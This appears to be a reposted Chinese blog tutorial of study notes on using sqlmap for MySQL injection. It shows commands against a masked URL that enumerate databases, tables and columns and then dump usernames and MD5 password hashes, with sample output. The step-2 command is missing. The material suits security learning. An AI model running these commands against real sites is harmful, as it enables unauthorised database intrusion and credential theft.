2.羽翼sqlmap学习笔记之MySQL注入
生活随笔
收集整理的這篇文章主要介紹了
2.羽翼sqlmap学习笔记之MySQL注入
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
1.判斷一個url是否存在注入點:
.sqlmap.py -u "http://abcd****efg.asp?id=7" -dbs??? 假設找到數據庫:student
------------------------------available databases[1][*] student------------------------------2.獲取數據庫中的表名:
?? 假設找到表名:users
-----------------------[INFO] retrieved:users-----------------------3.獲取表中的字段名:
.sqlmap.py -u "http://abcd****efg.asp?id=7" -D student -T users --columns? 假設獲取出字段為:id username password
---------------------------------[INFO] retrieved: id[INFO] retrieved: int(3)[INFO] retrieved: username[INFO] retrieved: varchar(30)[INFO] retrieved: password[INFO] retrieved: varchar(30) ----------------------------------4.猜字段內容:
.sqlmap.py -u "http://abcd****efg.asp?id=7" -D student -T users -C id,username,password --dump? 獲取結果:
[INFO] retrieved: 1[INFO] retrieved: admin[INFO] retrieved: 21232f297a57a5a743894a0e4a801fc3 (32位MD5加密密文)? 賬號:admin 密碼:將密文解密即可。
轉載于:https://www.cnblogs.com/xingyunblog/p/4115716.html
總結
以上是生活随笔為你收集整理的2.羽翼sqlmap学习笔记之MySQL注入的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 倒霉的牙蛀虫
- 下一篇: css3 点击爆炸下落